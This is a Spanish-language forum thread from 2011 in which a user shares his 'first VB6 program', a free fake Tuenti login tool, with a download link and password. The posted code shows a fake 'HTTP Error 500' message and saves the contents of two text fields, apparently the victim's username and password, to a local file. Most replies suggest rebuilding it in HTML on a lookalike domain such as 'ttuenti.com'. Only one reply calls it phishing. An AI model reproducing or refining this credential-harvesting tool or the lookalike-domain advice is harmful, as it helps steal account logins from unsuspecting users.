elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Mi primer programa en VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Mi primer programa en VB6  (Leído 3,169 veces)
NorteaComputer

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Mi primer programa en VB6
« en: 3 Agosto 2011, 18:31 pm »

Buenas :)

el otro dia ya comente  un video sobre una persona que vendia un fake de tuenti y bueno si lo han visto lo recordaran.El tipo lo vendia a  nose si creo recordar eran unos 3 euros o algo asi.Yo he creado uno parecido, tengo que decir que el suyo estaba mas currado pero bueno el resultado es el mismo, los dos sirven por igual solo que el mio es gratis.He recibido a mi cuenta de youtube un mensaje de esta persona que vendia su programa intentado de alguna forma amenazarme xDD y yo solo lo que hize fue comentar en su video que intentaria crear uno igual y lo subiria gratis pero en fin la gente es asi jaja

Les dejo el programa que la verdad no tiene ninguna complicacion programarlo y apenas tiene lineas de codigo pero me ha echo ilusion porque es mi primer programa y eso :)

DESCARGA:http://www.megaupload.com/?d=FNHD7BT8
PASS: norteacomputer


Código
  1. Private Sub Command1_Click()
  2. MsgBox ("HTTP Error 500 Internal server error")
  3. Dim F As Byte
  4. F = FreeFile
  5. Open App.Path & "\" & "FILESAVE.txt" For Append As #F
  6. Print #F, Text1.Text
  7. Print #F, Text2.Text
  8. Close #F
  9. End Sub





« Última modificación: 4 Agosto 2011, 09:35 am por NorteaComputer » En línea

Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #1 en: 4 Agosto 2011, 01:08 am »

Estaria copado que expliques bien que es lo que hace para los que no saben de que se trata xD mucha gente no tiene ganas de buscar xD son vagos ¬ xD


En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #2 en: 4 Agosto 2011, 04:04 am »

y porque no en html?  ;D
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
NorteaComputer

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #3 en: 4 Agosto 2011, 09:31 am »

LunaHack yo creo que si lo descargas es tan simple que ya veras lo que hace xd
pero si quieres que lo explique hize un video para mi canal ayer, solo que no lo vi necesario ponerlo en este foro. Aunque bueno edito el post y lo pongo :)
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #4 en: 4 Agosto 2011, 17:28 pm »

Y ese codigo que pusiste? eso es lo q hace? lo hubieras creado en html como dice EC y con un dominio ttuenti.com no se
En línea

NorteaComputer

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #5 en: 4 Agosto 2011, 17:33 pm »

La verdad esque si es lo unico que hace  :xD Ya dije que era super simple pero ademas la verdad esque es bastante cutre , la verdad esque subi a internet lo primero que me salio, sacare mas versiones y espero que sean algo mejores :)
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #6 en: 4 Agosto 2011, 17:36 pm »

No vale la pena, ya hay muchas cosas de estas, busca sobre phishing asi entenderas que lo tuyo esta mal porque lo haces en una aplicacion xD

Crea otra cosa si estas aprendiendo a programar recien
En línea

NorteaComputer

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #7 en: 4 Agosto 2011, 17:39 pm »

Ya bueno eso tambien es otra opcion  :xD :xD :xD
En línea

Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: Mi primer programa en VB6
« Respuesta #8 en: 5 Agosto 2011, 02:44 am »

Osea esta bien hacemos copy-Paste y listo vemos como esta...
pero hay users que no entienden nada de nada, que recien inician en este maravilloso mundo de la informatica
como gran curiosos que son entran en tu post y no entienden ni la jota e.e
entonces taria copado que digas
esto hace tal cosa y tal cosa xD
osea no te estoy diciendo que esta mal lo que hiciste al contrario esta muy bien :)

solo es un consejo :)

P/D: como dijeron los users proba HTML :) va a quedar mejor xD
En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Mi primer programa con VB2008
.NET (C#, VB.NET, ASP)
ElBarney-D 1 2,737 Último mensaje 19 Abril 2008, 06:27 am
por seba123neo
Mi primer programa en VB « 1 2 »
Programación Visual Basic
Pedro_madrid 12 5,269 Último mensaje 31 Mayo 2008, 11:56 am
por Pedro_madrid
[VB6] Una ayuda con mi primer programa... plz :) « 1 2 »
Programación Visual Basic
SuperDraco 15 6,882 Último mensaje 16 Julio 2011, 13:04 pm
por SuperDraco
Mi primer Programa y duda!!!
Programación Visual Basic
punkacs 7 2,751 Último mensaje 7 Agosto 2011, 23:14 pm
por Elemental Code
Primer programa en C con vectores « 1 2 »
Programación C/C++
sora_ori 10 12,246 Último mensaje 6 Diciembre 2012, 03:39 am
por jhousef_innovador
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines